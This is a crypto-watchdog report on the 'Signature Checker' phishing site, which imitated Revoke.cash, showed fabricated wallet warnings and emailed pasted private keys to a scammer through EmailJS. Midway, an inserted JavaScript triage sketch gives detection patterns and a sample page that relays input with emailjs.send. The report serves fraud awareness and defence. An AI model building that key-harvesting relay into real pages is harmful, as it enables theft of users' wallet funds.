QUADRIGA INITIATIVE
CRYPTO WATCHDOG & FRAUD RECOVERY PLATFORM
A COMMUNITY-BASED, NOT-FOR-PROFIT
UNKNOWN
MAY 2025
GLOBAL
SIGNATURE CHECKER
DESCRIPTION OF EVENTS
Most users first come across the Signature Checker website through social media, especially on platforms like X (formerly Twitter). Typically, they might notice a reply or direct message from someone who appears knowledgeable about blockchain security. This person may respond to a user’s post about a recent transaction or general crypto discussion, pointing out that their wallet might have a risky authorization and recommending they check it using a tool like Signature Checker.
The message often feels helpful and urgent, with the person claiming they noticed something unusual or that the user may have unknowingly signed a harmful transaction. They might even include a tutorial link or step-by-step instructions to “fix” the issue using the suggested tool. This kind of outreach can feel like timely assistance from a concerned member of the crypto community.
When users follow the link, they’re taken directly to the Signature Checker homepage. Users are greeted with a clean and professional-looking interface that appears similar to other popular blockchain tools. The homepage prominently features a search bar inviting users to input their wallet address to "check for risky authorizations" or security issues related to their wallet. For users concerned about the safety of their crypto assets, this seems like a helpful and timely service.
The site claims to scan a user’s wallet for any potentially dangerous or outdated token approvals—permissions that may allow external applications to move tokens on behalf of the user. After entering a wallet address, the tool quickly generates a report highlighting any "risky approvals," along with timestamps and specific contract details, giving users the impression that it's actively monitoring blockchain activity in real time.
The design mimics the familiar aesthetics of trusted blockchain utilities, with a dark-themed layout, simple icons, and technical terms displayed in a way that feels authoritative. For added convenience, there’s even an option to “resolve” or “revoke” the identified risks, and users are guided through the process step-by-step. The site appears to be a useful resource for anyone looking to improve their wallet security or stay informed about potential threats in their transaction history.
The Signature Checker website, hosted at signature[.]land, is a sophisticated phishing platform designed to deceive cryptocurrency users into surrendering their private keys under the guise of a security tool. Its user interface is intentionally crafted to closely resemble the legitimate Revoke.cash site, a well-known tool used to manage token approvals and permissions on blockchain wallets. This visual mimicry plays a crucial role in lowering the user’s guard, creating a false sense of legitimacy and security.
Upon visiting the site, users are presented with warnings claiming their wallet has a “risky authorization” and are prompted to input their wallet address or, more dangerously, their private key to check for potential threats. The site is engineered to fabricate results: no matter what address is entered, it consistently displays an urgent warning about supposed suspicious approvals, with timestamps designed to appear recent. This strategy creates a false sense of urgency, pressuring users to act immediately in hopes of "revoking" harmful permissions.
However, the tool’s underlying functionality is purely malicious. SlowMist’s analysis of the site’s front-end code revealed that it uses EmailJS, an email-sending service, to transmit all user input—whether addresses or private keys—directly to the attacker’s email inbox: abpulimali@gmail[.]com. The site also uses the Etherscan API to validate wallet addresses, adding another layer of apparent legitimacy.
In reality, the Signature Checker site is a textbook example of a social engineering scam dressed in technical credibility. It leverages fear, impersonation, and familiarity to exploit users, particularly those less experienced with Web3 security practices. The site is actively flagged as malicious by security services like Scam Sniffer and is part of a broader campaign run by a scammer impersonating crypto security figures and engaging users via social media platforms.
The scam relies on proximity to the trusted revoke.cash link, a frontend design to instill trust, scripted logic to fabricate warnings, and backend email APIs to exfiltrate data—all wrapped in social engineering that exploits the user’s fear and desire to secure their assets quickly.
The scheme behind the Signature Checker phishing site operates through a combination of frontend deception, social engineering, and backend data harvesting. At its core, the site is designed to mimic the appearance and behavior of legitimate wallet authorization management tools like Revoke.cash. It presents users with a sleek interface that accepts wallet addresses and claims to scan for "risky authorizations" or approvals. However, these results are entirely fabricated—regardless of the input, the site displays alarming warnings suggesting the wallet is compromised, often including a timestamp close to the time of the check to create a false sense of urgency.
The site is built to capture sensitive user input. The most critical element is the prompt asking users to paste in their address or private key under the pretense of checking for risky approvals. If the user inputs a private key, the site uses EmailJS, a JavaScript-based email API, to immediately transmit that data to the scammer’s email address (abpulimali@gmail[.]com). This data exfiltration happens silently in the background, without the user's knowledge. Even if the input is invalid or causes an error on-screen, the information is still sent.
If the user enters a valid wallet address, the site calls the Etherscan API to verify that the submitted address is valid and exists on-chain. The user is presented with a polished UI and real-time error feedback, which gives the impression that they are interacting with a genuine security platform and that their wallet is at risk. Attempting to revoke the supposedly malicious signature is suspected to trigger a request for wallet permissions.
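A defender-side triage sketch for the pattern described above, added here as an example (it is not SlowMist's code or the site's code): it flags page source that both prompts for a secret and loads a client-side EmailJS relay, and it classifies pasted input by length. The indicator list, weights, verdict names and sample strings are assumptions constructed for illustration.

```javascript
// Added example: static triage of page source for the pattern described above.
// Indicator names, weights and the sample strings are assumptions.
const INDICATORS = [
  { id: "asks_for_secret", weight: 3,
    re: /private\s*key|seed\s*phrase|recovery\s*phrase|mnemonic/i },
  { id: "emailjs_sdk", weight: 2,
    re: /@emailjs\/browser|emailjs-com|api\.emailjs\.com/i },
  { id: "emailjs_send_call", weight: 2, re: /\bemailjs\s*\.\s*send(Form)?\s*\(/ },
  { id: "etherscan_api", weight: 1, re: /api\.etherscan\.io/i },
];

function triagePage(source) {
  const hits = INDICATORS.filter((i) => i.re.test(source));
  const ids = hits.map((i) => i.id);
  const score = hits.reduce((sum, i) => sum + i.weight, 0);
  // A secret prompt plus a client-side mail relay is the combination that
  // matters; either one alone also appears on benign pages.
  const secret = ids.includes("asks_for_secret");
  const relay = ids.some((id) => id.startsWith("emailjs_"));
  const verdict = secret && relay ? "block" : score >= 3 ? "review" : "pass";
  return { score, ids, verdict };
}

// An address is 20 bytes (40 hex chars); a raw private key is 32 bytes (64 hex
// chars, the same length as a transaction hash, hence "possible").
function classifyInput(text) {
  const t = text.trim();
  if (/^0x[0-9a-fA-F]{40}$/.test(t)) return "address";
  if (/^(0x)?[0-9a-fA-F]{64}$/.test(t)) return "possible-private-key";
  const words = t.split(/\s+/);
  if (words.length >= 12 && /^[a-z\s]+$/.test(t)) return "possible-seed-phrase";
  return "other";
}

// Constructed samples (not taken from the real site).
const SAMPLE_SUSPECT = `<input id="q" placeholder="Wallet address or private key">
<script src="https://cdn.jsdelivr.net/npm/@emailjs/browser@4/dist/email.min.js"></script>
<script>emailjs.send("SERVICE_ID", "TEMPLATE_ID", { value: q.value });</script>`;
const SAMPLE_BENIGN = `<input placeholder="Wallet address (0x...)">
<script>fetch("https://api.etherscan.io/api?module=account")</script>`;

console.log(triagePage(SAMPLE_SUSPECT));
console.log(triagePage(SAMPLE_BENIGN));
console.log(classifyInput("0x" + "ab".repeat(32)));
```

An approval checker only ever needs the 40-hex-character address, so a wallet-side or browser-extension guard can treat any "possible-private-key" or "possible-seed-phrase" paste into a web form as a stop condition.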
It is unknown how many users have lost funds through this method.
SlowMist posted a guideline online about the incident and sent out a tweet to warn others.
The domain appears to be taken down for the moment.
This type of scheme will likely return.
Many users first encounter the Signature Checker website through seemingly helpful messages on social media, where someone posing as a security expert warns them about a risky wallet authorization and suggests checking it using the tool. The site itself looks polished and legitimate, mimicking trusted platforms like Revoke.cash and claiming to detect dangerous token approvals. Once users enter a wallet address or private key, the tool fabricates warnings to create urgency, pushing them to take immediate action. Behind the scenes, any data entered—especially private keys—is silently sent to the attacker via an email API. Though the site has been taken down, the scheme highlights how social engineering, urgency, and fake security tools can be weaponized to exploit crypto users, and it will likely reappear in some form.
SlowMist - "We recently assisted a user who encountered a suspicious tool claiming his wallet had a “risky authorization.” The tool prompted him to paste his private key to resolve the issue." - Twitter/X (Jun 2)
Behind the Mask: SlowMist Reveals How a Fake Security Expert Tricked Crypto Users - SlowMist Medium (Jun 2)
Spotting the Difference: Identifying Genuine and Fake Twitter Accounts - SlowMist Medium (Jun 2)
https://x.com/SlowMist_Team/status/1929456115173257558 (Jun 10)
